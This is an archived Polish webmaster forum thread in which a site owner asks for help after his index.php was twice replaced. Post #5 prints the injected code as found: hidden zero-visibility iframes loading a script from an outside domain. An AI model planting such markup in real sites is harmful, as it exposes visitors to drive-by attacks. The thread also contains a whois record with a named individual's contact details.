![]() |
![]() ![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 19 Pomógł: 0 Dołączył: 22.08.2007 Ostrzeżenie: (0%) ![]() ![]() |
Otórz wczoraj wszedłem na swoją stonę i zauważyłem że nie chce się załadować, sprawdziłem więc index.php Okazało się że jego zawartość została skasowana a na jej miejsce wpisany został kod html z niewidocznym iframe prowadzącym do http://golden-corps.com/script.php Na szczęście budowa mojego skryptu zapobiegła większym stratom. Odnowiłem index.php i od tego czasu jak na razie nic się nie zmieniło.
Moja witryna leży na http://www.gno-cms.yoyo.pl Skrypt cały czas w budowie więc okno które się wyświetliło jest non stop. Czy ktoś może sprawdzić czy może zastosowano jakąś technike mniej mi znaną, bo sporo już w tym siedze i myślałem że wystarczająco zabezpieczyłem kod. |
|
|
![]()
Post
#2
|
|
![]() Grupa: Zarejestrowani Postów: 1 387 Pomógł: 273 Dołączył: 18.02.2008 Ostrzeżenie: (0%) ![]() ![]() |
Jeżeli dzieją się takie cuda, niekoniecznie jest to przyczyną dziury w skrypcie (który chyba nie jest aż tak skomplikowany, by modyfikować pliki?). Bardziej prawdopodobne jest to, że masz wirusa bądź używasz jakiegoś pirackiego programu do uploadu plików na ftp, który wysyła Twoje hasła w niewłaściwe miejsca...
-------------------- XMPP: l0ud@chrome.pl
|
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 19 Pomógł: 0 Dołączył: 22.08.2007 Ostrzeżenie: (0%) ![]() ![]() |
Nie wiem może to tylko przypadek. W każdym razie do filtrowania forma użyłem coś takiego:
CODE IF(strlen($_POST['login'])>6 && strlen($_POST['login'])<15 && strlen($_POST['pass'])<15 && preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['login']) && preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['pass'])) { Chyba troche nadmiar ale raczej nie da sie nic zrobić w stylu SQL injectio prawda? Aaa i jeszcze jedno. Do walidacji postów na forum wystarczy użyć addshlashes()? Znalazłem też funkcje urldecode(), oraz urlencode() Może sie przydać taka funkcja do zabezpieczenia? Ten post edytował piotras9000 22.03.2008, 10:45:08 |
|
|
![]()
Post
#4
|
|
![]() Grupa: Zarejestrowani Postów: 304 Pomógł: 51 Dołączył: 4.02.2005 Skąd: Kraków Ostrzeżenie: (0%) ![]() ![]() |
Kiedyś słyszałem o podobnym przypadku, ale w nim nie kasowana była zawartość index, ale na końcu "doklejana" niewidoczna ramka. Była to wina serwera, a dokładniej dziura w CPanelu. Być może tutaj jest podobnie.
-------------------- |
|
|
![]()
Post
#5
|
|
Grupa: Zarejestrowani Postów: 19 Pomógł: 0 Dołączył: 22.08.2007 Ostrzeżenie: (0%) ![]() ![]() |
I znowu to samo. Tym razem na inną moją strone. Inne hasło a i ostatni raz ją modyfikowałem miesiąc temu i od tamtej pory tylko wchodziłem z przeglądarki więc to raczej wina albo serwera albo jakiegoś dobrego hackera bo więcej możliwości nie widze. Jeżeli serwera to yoyo.pl ma niezły problem :/ Tym razem mam kod który został zamieszczony. Tak jak ostatnio index.php został do cna wyczyszczony a zapisano do niego:
CODE <!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--> <!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe--> <iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe> Ten post edytował piotras9000 22.03.2008, 23:21:14 |
|
|
![]()
Post
#6
|
|
Grupa: Zarejestrowani Postów: 17 Pomógł: 4 Dołączył: 6.03.2008 Ostrzeżenie: (0%) ![]() ![]() |
Podobne włamanie (?) jest opisane tutaj - http://forum.pirotechnika.one.pl/viewtopic.php?p=139940 .
Może znajdziesz podobieństwa z włamaniem na Twoją stronę. [EDIT] Kolejne strony z podobnymi włamaniami: [patrz zrodlo] http://www.eko-elw.pl/ http://www.pqn.pl/baranow-sandomierski/ http://64.233.183.104/search?q=cache:JhEFj...lient=firefox-a Wygląda na to ze nie jest to włamanie wymierzone konkretnie w Ciebie, mi to wygląda na masówkę polegającą na dopisaniu kodu html w plikach takich jak index.html / index.php etc. Może zmień klienta ftp? BTW. Sprawdzałeś logi? - to powinno wyjaśnić czy ktoś przechwycił hasło do ftp, czy włamał się przez stronę www. Ten post edytował Firez 23.03.2008, 00:22:41 |
|
|
![]()
Post
#7
|
|
Grupa: Zarejestrowani Postów: 19 Pomógł: 0 Dołączył: 22.08.2007 Ostrzeżenie: (0%) ![]() ![]() |
No właśnie widze. Sprawdziłem logi i rzeczywiście coś/ktoś się logował. Lecz bardziej mi to wygląda na robote bota niż hackera. 0 zabezpieczeń, IP osoby bez problemy namierzyłem, do tego stałe
![]() ![]() inetnum: 89.201.164.0 - 89.201.164.255 netname: PlusHosting descr: Plus Hosting descr: Istarska 36 descr: 52100 Pula country: HR admin-c: ZG232-RIPE tech-c: ZG232-RIPE status: ASSIGNED PA remarks: INFRA-AW mnt-by: OT-MNT source: RIPE # Filtered person: Zvonimir Gembec address: Plus Hosting address: 52100 Pula address: Croatia abuse-mailbox: http://www.domaintools.com/registrant-sear...5acd0ffebfa8b7e phone: +385 52 380 870 fax-no: +385 52 210 685 mnt-by: OT-MNT nic-hdl: ZG232-RIPE source: RIPE # Filtered route: 89.201.128.0/17 descr: OT - Optima Telekom d.o.o. origin: AS34594 mnt-by: OT-MNT source: RIPE # Filtered |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 15.06.2025 - 21:49 |